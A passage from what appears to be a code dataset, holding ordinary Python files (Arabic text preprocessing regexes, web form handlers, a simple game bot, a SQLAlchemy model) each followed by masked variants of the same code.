elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(\n elongation_pattern, elongation_replacement, text, flags=re.MULTILINE\n )\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = \" \" + \"\".join(list(sub)) + \" \"\n text = \"\".join(\n (text[: result.span()[0] + dif], sub, text[result.span()[1] + dif :])\n )\n text_ = \"\".join(\n (text_[: result.span()[0]], text_[result.span()[1] :])\n ).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub(r\"\\s+\", \" \", text)\n return text.strip()\n\n\nprefix_list = [\n \"ال\",\n \"و\",\n \"ف\",\n \"ب\",\n \"ك\",\n \"ل\",\n \"لل\",\n \"\\u0627\\u0644\",\n \"\\u0648\",\n \"\\u0641\",\n \"\\u0628\",\n \"\\u0643\",\n \"\\u0644\",\n \"\\u0644\\u0644\",\n \"س\",\n]\nsuffix_list = [\n \"ه\",\n \"ها\",\n \"ك\",\n \"ي\",\n \"هما\",\n \"كما\",\n \"نا\",\n \"كم\",\n \"هم\",\n \"هن\",\n \"كن\",\n \"ا\",\n \"ان\",\n \"ين\",\n \"ون\",\n \"وا\",\n \"ات\",\n \"ت\",\n \"ن\",\n \"ة\",\n \"\\u0647\",\n \"\\u0647\\u0627\",\n \"\\u0643\",\n \"\\u064a\",\n \"\\u0647\\u0645\\u0627\",\n \"\\u0643\\u0645\\u0627\",\n \"\\u0646\\u0627\",\n \"\\u0643\\u0645\",\n \"\\u0647\\u0645\",\n \"\\u0647\\u0646\",\n \"\\u0643\\u0646\",\n \"\\u0627\",\n \"\\u0627\\u0646\",\n \"\\u064a\\u0646\",\n \"\\u0648\\u0646\",\n \"\\u0648\\u0627\",\n \"\\u0627\\u062a\",\n \"\\u062a\",\n \"\\u0646\",\n \"\\u0629\",\n]\nother_tokens = [\"[رابط]\", \"[مستخدم]\", \"[بريد]\"]\n\n# the never_split list is ussed with the transformers library\nprefix_symbols = [x + \"+\" for x in prefix_list]\nsuffix_symblos = [\"+\" + x for x in suffix_list]\nnever_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))\n\nurl_regexes = [\n r\"(http(s)?:\\/\\/.)?(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,6}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)\",\n r\"@(https?|ftp)://(-\\.)?([^\\s/?\\.#-]+\\.?)+(/[^\\s]*)?$@iS\",\n r\"http[s]?://[a-zA-Z0-9_\\-./~\\?=%&]+\",\n r\"www[a-zA-Z0-9_\\-?=%&/.~]+\",\n r\"[a-zA-Z]+\\.com\",\n r\"(?=http)[^\\s]+\",\n r\"(?=www)[^\\s]+\",\n r\"://\",\n]\nuser_mention_regex = r\"@[\\w\\d]+\"\nemail_regexes = [r\"[\\w-]+@([\\w-]+\\.)+[\\w-]+\", r\"\\S+@\\S+\"]\nredundant_punct_pattern = (\n r\"([!\\\"#\\$%\\'\\(\\)\\*\\+,\\.:;\\-<=·>?@\\[\\\\\\]\\^_ـ`{\\|}~—٪’،؟`୍“؛”ۚ【»؛\\s+«–…‘]{2,})\"\n)\nregex_tatweel = r\"(\\D)\\1{2,}\"\nrejected_chars_regex = r\"[^0-9\\u0621-\\u063A\\u0640-\\u066C\\u0671-\\u0674a-zA-Z\\[\\]!\\\"#\\$%\\'\\(\\)\\*\\+,\\.:;\\-<=·>?@\\[\\\\\\]\\^_ـ`{\\|}~—٪’،؟`୍“؛”ۚ»؛\\s+«–…‘]\"\n\nregex_url_step1 = r\"(?=http)[^\\s]+\"\nregex_url_step2 = r\"(?=www)[^\\s]+\"\nregex_url = r\"(http(s)?:\\/\\/.)?(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,6}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)\"\nregex_mention = r\"@[\\w\\d]+\"\nregex_email = r\"\\S+@\\S+\"\n\nchars_regex = r\"0-9\\u0621-\\u063A\\u0640-\\u066C\\u0671-\\u0674a-zA-Z\\[\\]!\\\"#\\$%\\'\\(\\)\\*\\+,\\.:;\\-<=·>?@\\[\\\\\\]\\^_ـ`{\\|}~—٪’،؟`୍“؛”ۚ»؛\\s+«–…‘\"\n\nwhite_spaced_double_quotation_regex = r'\\\"\\s+([^\"]+)\\s+\\\"'\nwhite_spaced_single_quotation_regex = r\"\\'\\s+([^']+)\\s+\\'\"\nwhite_spaced_back_quotation_regex = r\"\\`\\s+([^`]+)\\s+\\`\"\nwhite_spaced_em_dash = r\"\\—\\s+([^—]+)\\s+\\—\"\n\nleft_spaced_chars = r\" ([\\]!#\\$%\\),\\.:;\\?}٪’،؟”؛…»·])\"\nright_spaced_chars = r\"([\\[\\(\\{“«‘*\\~]) \"\nleft_and_right_spaced_chars = r\" ([\\+\\-\\<\\=\\>\\@\\\\\\^\\_\\|\\–]) \"\n",
"step-ids": [
12,
13,
14,
15,
16
]
}
|
[
12,
13,
14,
15,
16
] |
from handler.auth import provider_required
from handler.provider import ProviderBaseHandler
from forms.provider import ProviderAddressForm, ProviderVanityURLForm
import logging
from data import db
from util import saved_message
class ProviderEditAddressHandler(ProviderBaseHandler):
@provider_required
def get(self, vanity_url=None):
provider = db.get_provider_from_vanity_url(vanity_url)
logging.info("provider dump before edit:" + str(vars(provider)))
address_form = ProviderAddressForm().get_form(obj=provider)
vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)
self.render_address(provider, address_form=address_form, vanity_url_form=vanity_url_form)
@provider_required
def post(self, vanity_url=None):
form = ProviderAddressForm().get_form(self.request.POST)
if form.validate():
# Store Provider
provider = db.get_provider_from_vanity_url(vanity_url)
form.populate_obj(provider)
provider.put()
vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)
self.render_address(provider, address_form=form, vanity_url_form=vanity_url_form, success_message=saved_message)
# log the event
self.log_event(user=provider.user, msg="Edit Address: Success")
else:
# show validation error
provider = db.get_provider_from_vanity_url(vanity_url)
vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)
self.render_address(provider, address_form=form, vanity_url_form=vanity_url_form)
# log the event
self.log_event(user=provider.user, msg="Edit Address: Validation Error")
class ProviderChangeURLHandler(ProviderBaseHandler):
@provider_required
def post(self, vanity_url=None):
form = ProviderVanityURLForm().get_form(self.request.POST)
if form.validate():
# Store Provider
provider = db.get_provider_from_vanity_url(vanity_url)
form.populate_obj(provider)
provider.put()
self.redirect('/provider/address/' + provider.vanity_url)
# log the event
self.log_event(user=provider.user, msg="Edit Address: Success")
else:
# show validation error
provider = db.get_provider_from_vanity_url(vanity_url)
address_form = ProviderAddressForm().get_form(obj=provider)
self.render_address(provider, address_form=address_form, vanity_url_form=form)
# log the event
self.log_event(user=provider.user, msg="Edit Address: Validation Error")
|
normal
|
{
"blob_id": "454f885e2254295ce6508e70c0348f5cbe855520",
"index": 5071,
"step-1": "<mask token>\n\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n <mask token>\n <mask token>\n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n self.redirect('/provider/address/' + provider.vanity_url)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n",
"step-2": "<mask token>\n\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n\n @provider_required\n def get(self, vanity_url=None):\n provider = db.get_provider_from_vanity_url(vanity_url)\n logging.info('provider dump before edit:' + str(vars(provider)))\n address_form = ProviderAddressForm().get_form(obj=provider)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=vanity_url_form)\n <mask token>\n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n self.redirect('/provider/address/' + provider.vanity_url)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n",
"step-3": "<mask token>\n\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n\n @provider_required\n def get(self, vanity_url=None):\n provider = db.get_provider_from_vanity_url(vanity_url)\n logging.info('provider dump before edit:' + str(vars(provider)))\n address_form = ProviderAddressForm().get_form(obj=provider)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=vanity_url_form)\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderAddressForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=form,\n vanity_url_form=vanity_url_form, success_message=saved_message)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=form,\n vanity_url_form=vanity_url_form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n self.redirect('/provider/address/' + provider.vanity_url)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n",
"step-4": "from handler.auth import provider_required\nfrom handler.provider import ProviderBaseHandler\nfrom forms.provider import ProviderAddressForm, ProviderVanityURLForm\nimport logging\nfrom data import db\nfrom util import saved_message\n\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n\n @provider_required\n def get(self, vanity_url=None):\n provider = db.get_provider_from_vanity_url(vanity_url)\n logging.info('provider dump before edit:' + str(vars(provider)))\n address_form = ProviderAddressForm().get_form(obj=provider)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=vanity_url_form)\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderAddressForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=form,\n vanity_url_form=vanity_url_form, success_message=saved_message)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=form,\n vanity_url_form=vanity_url_form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n self.redirect('/provider/address/' + provider.vanity_url)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n",
"step-5": "from handler.auth import provider_required\nfrom handler.provider import ProviderBaseHandler\nfrom forms.provider import ProviderAddressForm, ProviderVanityURLForm\nimport logging\nfrom data import db\nfrom util import saved_message\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n @provider_required\n def get(self, vanity_url=None):\n provider = db.get_provider_from_vanity_url(vanity_url)\n logging.info(\"provider dump before edit:\" + str(vars(provider)))\n address_form = ProviderAddressForm().get_form(obj=provider)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n\n self.render_address(provider, address_form=address_form, vanity_url_form=vanity_url_form)\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderAddressForm().get_form(self.request.POST)\n \n if form.validate():\n # Store Provider\n provider = db.get_provider_from_vanity_url(vanity_url)\n \n form.populate_obj(provider)\n provider.put()\n\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n\n self.render_address(provider, address_form=form, vanity_url_form=vanity_url_form, success_message=saved_message)\n\n # log the event\n self.log_event(user=provider.user, msg=\"Edit Address: Success\")\n\n else:\n # show validation error\n provider = db.get_provider_from_vanity_url(vanity_url)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n\n self.render_address(provider, address_form=form, vanity_url_form=vanity_url_form)\n \n # log the event\n self.log_event(user=provider.user, msg=\"Edit Address: Validation Error\")\n\n\n\n \n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n \n if form.validate():\n # Store Provider\n provider = db.get_provider_from_vanity_url(vanity_url)\n \n form.populate_obj(provider)\n \n provider.put()\n\n self.redirect('/provider/address/' + provider.vanity_url)\n\n # log the event\n self.log_event(user=provider.user, msg=\"Edit Address: Success\")\n\n else:\n # show validation error\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n\n self.render_address(provider, address_form=address_form, vanity_url_form=form)\n \n # log the event\n self.log_event(user=provider.user, msg=\"Edit Address: Validation Error\")\n\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import numpy as np
import json
import random
from encapsulate_state import StateEncapsulator
from scalar_to_action import ActionMapper
import pickle
from basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP
import matplotlib.pyplot as plt
STATE_FILENAME = "state3.json"
CONFIG_FILENAME = "bot.json"
WEIGHTS_FILENAME = "weights.pkl"
DO_NOTHING_ACTION = [-1, -1, -1]
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, "r") as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, "rb") as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ""
# Expects as input a 3D tensor representing the state, un-flattened; returns a list action
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if (not np.all(action_list == DO_NOTHING_ACTION)) and action_list[2] != -1:
self.command = str(action_list[0]) + "," + str(action_list[1]) + "," + str(action_list[2])
with open("command.txt", "w") as outfl:
outfl.write(self.command)
############################################################################################
if __name__ == "__main__":
with open(CONFIG_FILENAME, "r") as f:
data = json.load(f)
player_name = data["nickName"]
player = "A" if player_name == "Guido" else "B"
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
|
normal
|
{
"blob_id": "e9a6baf10efc5b6bd07af1fe352b0b17ecc172bd",
"index": 1855,
"step-1": "<mask token>\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n <mask token>\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-3": "<mask token>\nSTATE_FILENAME = 'state3.json'\nCONFIG_FILENAME = 'bot.json'\nWEIGHTS_FILENAME = 'weights.pkl'\nDO_NOTHING_ACTION = [-1, -1, -1]\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-4": "import numpy as np\nimport json\nimport random\nfrom encapsulate_state import StateEncapsulator\nfrom scalar_to_action import ActionMapper\nimport pickle\nfrom basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP\nimport matplotlib.pyplot as plt\nSTATE_FILENAME = 'state3.json'\nCONFIG_FILENAME = 'bot.json'\nWEIGHTS_FILENAME = 'weights.pkl'\nDO_NOTHING_ACTION = [-1, -1, -1]\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-5": "import numpy as np \nimport json \nimport random\nfrom encapsulate_state import StateEncapsulator\nfrom scalar_to_action import ActionMapper\nimport pickle\nfrom basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP\nimport matplotlib.pyplot as plt\n\nSTATE_FILENAME = \"state3.json\"\nCONFIG_FILENAME = \"bot.json\"\nWEIGHTS_FILENAME = \"weights.pkl\"\nDO_NOTHING_ACTION = [-1, -1, -1]\n\nclass LinearBot(object):\n\t\tdef __init__(self, player, player_name, weights_file, basis):\n\t\t\tself.reader = StateEncapsulator(player, player_name)\n\n\t\t\twith open(STATE_FILENAME, \"r\") as f:\n\t\t\t\tdata = json.load(f)\n\t\t\tself.state = self.reader.parse_state(data)\n\n\t\t\twith open(weights_file, \"rb\") as pkl:\n\t\t\t\tself.weights = pickle.load(pkl)\n\n\t\t\tself.action_mapper = ActionMapper()\n\t\t\tself.basis = basis\n\t\t\tself.command = \"\"\n\n\t\t# Expects as input a 3D tensor representing the state, un-flattened; returns a list action\n\t\tdef __get_next_action(self, sp):\n\t\t\tsp = sp.flatten()\n\t\t\tq_values = []\n\t\t\tfor action in self.action_mapper.triples:\n\t\t\t\tsp_ap = np.array(list(sp) + list(action))\n\t\t\t\tsp_ap = self.basis(sp_ap)\n\t\t\t\tq_values.append(np.dot(sp_ap, self.weights))\n\n\t\t\treturn list(self.action_mapper.triples[np.argmax(q_values)])\n\n\t\tdef write_action(self):\n\t\t\taction_list = self.__get_next_action(self.state)\n\t\t\tif (not np.all(action_list == DO_NOTHING_ACTION)) and action_list[2] != -1:\n\t\t\t\tself.command = str(action_list[0]) + \",\" + str(action_list[1]) + \",\" + str(action_list[2])\n\t\t\twith open(\"command.txt\", \"w\") as outfl:\n\t\t\t\toutfl.write(self.command)\n\n############################################################################################\n\nif __name__ == \"__main__\":\n\twith open(CONFIG_FILENAME, \"r\") as f:\n\t\tdata = json.load(f)\n\t\tplayer_name = data[\"nickName\"]\n\t\tplayer = \"A\" if player_name == \"Guido\" else \"B\"\n\n\tbot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n\tbot.write_action()\n\t",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
from app import db
from datetime import datetime
from sqlalchemy.orm import validates
class Posts(db.Model):
id = db.Column(db.BigInteger, primary_key=True, autoincrement=True)
title = db.Column(db.String(200))
content = db.Column(db.Text)
category = db.Column(db.String(100))
created_date = db.Column(db.DateTime, default=datetime.utcnow)
updated_date = db.Column(db.DateTime, default=datetime.utcnow)
status = db.Column(db.Enum('Publish', 'Draft', 'Thrash', name='postsStatus'), default='Draft')
def __repr__(self):
return '<Posts {}>'.format(self.name)
@validates("title")
def validate_title(self, key, title):
if not title:
raise AssertionError("Title is required")
if len(title) < 20:
raise AssertionError("Title must be at least 20 character")
return title
@validates("content")
def validate_content(self, key, content):
if not content:
raise AssertionError("Content is required")
if len(content) < 200:
raise AssertionError("Content must be at least 200 character")
return content
@validates("category")
def validate_category(self, key, category):
if not category:
raise AssertionError("Category is required")
if len(category) < 3:
raise AssertionError("Category must be at least 3 character")
return category
@validates("status")
def validate_status(self, key, status):
if not status:
raise AssertionError("Status is required")
elif status not in ['Publish', 'Draft', 'Thrash']:
raise AssertionError("{} is not supported status".format(status))
return status
|
normal
|
{
"blob_id": "29298ee7ddb4e524a23000abf86854d72f49954c",
"index": 1850,
"step-1": "<mask token>\n\n\nclass Posts(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n\n @validates('title')\n def validate_title(self, key, title):\n if not title:\n raise AssertionError('Title is required')\n if len(title) < 20:\n raise AssertionError('Title must be at least 20 character')\n return title\n\n @validates('content')\n def validate_content(self, key, content):\n if not content:\n raise AssertionError('Content is required')\n if len(content) < 200:\n raise AssertionError('Content must be at least 200 character')\n return content\n\n @validates('category')\n def validate_category(self, key, category):\n if not category:\n raise AssertionError('Category is required')\n if len(category) < 3:\n raise AssertionError('Category must be at least 3 character')\n return category\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Posts(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n\n @validates('title')\n def validate_title(self, key, title):\n if not title:\n raise AssertionError('Title is required')\n if len(title) < 20:\n raise AssertionError('Title must be at least 20 character')\n return title\n\n @validates('content')\n def validate_content(self, key, content):\n if not content:\n raise AssertionError('Content is required')\n if len(content) < 200:\n raise AssertionError('Content must be at least 200 character')\n return content\n\n @validates('category')\n def validate_category(self, key, category):\n if not category:\n raise AssertionError('Category is required')\n if len(category) < 3:\n raise AssertionError('Category must be at least 3 character')\n return category\n\n @validates('status')\n def validate_status(self, key, status):\n if not status:\n raise AssertionError('Status is required')\n elif status not in ['Publish', 'Draft', 'Thrash']:\n raise AssertionError('{} is not supported status'.format(status))\n return status\n",
"step-3": "<mask token>\n\n\nclass Posts(db.Model):\n id = db.Column(db.BigInteger, primary_key=True, autoincrement=True)\n title = db.Column(db.String(200))\n content = db.Column(db.Text)\n category = db.Column(db.String(100))\n created_date = db.Column(db.DateTime, default=datetime.utcnow)\n updated_date = db.Column(db.DateTime, default=datetime.utcnow)\n status = db.Column(db.Enum('Publish', 'Draft', 'Thrash', name=\n 'postsStatus'), default='Draft')\n\n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n\n @validates('title')\n def validate_title(self, key, title):\n if not title:\n raise AssertionError('Title is required')\n if len(title) < 20:\n raise AssertionError('Title must be at least 20 character')\n return title\n\n @validates('content')\n def validate_content(self, key, content):\n if not content:\n raise AssertionError('Content is required')\n if len(content) < 200:\n raise AssertionError('Content must be at least 200 character')\n return content\n\n @validates('category')\n def validate_category(self, key, category):\n if not category:\n raise AssertionError('Category is required')\n if len(category) < 3:\n raise AssertionError('Category must be at least 3 character')\n return category\n\n @validates('status')\n def validate_status(self, key, status):\n if not status:\n raise AssertionError('Status is required')\n elif status not in ['Publish', 'Draft', 'Thrash']:\n raise AssertionError('{} is not supported status'.format(status))\n return status\n",
"step-4": "from app import db\nfrom datetime import datetime\nfrom sqlalchemy.orm import validates\n\n\nclass Posts(db.Model):\n id = db.Column(db.BigInteger, primary_key=True, autoincrement=True)\n title = db.Column(db.String(200))\n content = db.Column(db.Text)\n category = db.Column(db.String(100))\n created_date = db.Column(db.DateTime, default=datetime.utcnow)\n updated_date = db.Column(db.DateTime, default=datetime.utcnow)\n status = db.Column(db.Enum('Publish', 'Draft', 'Thrash', name=\n 'postsStatus'), default='Draft')\n\n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n\n @validates('title')\n def validate_title(self, key, title):\n if not title:\n raise AssertionError('Title is required')\n if len(title) < 20:\n raise AssertionError('Title must be at least 20 character')\n return title\n\n @validates('content')\n def validate_content(self, key, content):\n if not content:\n raise AssertionError('Content is required')\n if len(content) < 200:\n raise AssertionError('Content must be at least 200 character')\n return content\n\n @validates('category')\n def validate_category(self, key, category):\n if not category:\n raise AssertionError('Category is required')\n if len(category) < 3:\n raise AssertionError('Category must be at least 3 character')\n return category\n\n @validates('status')\n def validate_status(self, key, status):\n if not status:\n raise AssertionError('Status is required')\n elif status not in ['Publish', 'Draft', 'Thrash']:\n raise AssertionError('{} is not supported status'.format(status))\n return status\n",
"step-5": "from app import db\nfrom datetime import datetime\nfrom sqlalchemy.orm import validates\n\nclass Posts(db.Model):\n id = db.Column(db.BigInteger, primary_key=True, autoincrement=True)\n title = db.Column(db.String(200))\n content = db.Column(db.Text)\n category = db.Column(db.String(100))\n created_date = db.Column(db.DateTime, default=datetime.utcnow)\n updated_date = db.Column(db.DateTime, default=datetime.utcnow)\n status = db.Column(db.Enum('Publish', 'Draft', 'Thrash', name='postsStatus'), default='Draft')\n \n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n \n @validates(\"title\")\n def validate_title(self, key, title):\n if not title: \n raise AssertionError(\"Title is required\")\n if len(title) < 20:\n raise AssertionError(\"Title must be at least 20 character\")\n return title\n \n @validates(\"content\")\n def validate_content(self, key, content):\n if not content: \n raise AssertionError(\"Content is required\")\n if len(content) < 200:\n raise AssertionError(\"Content must be at least 200 character\")\n return content\n \n @validates(\"category\")\n def validate_category(self, 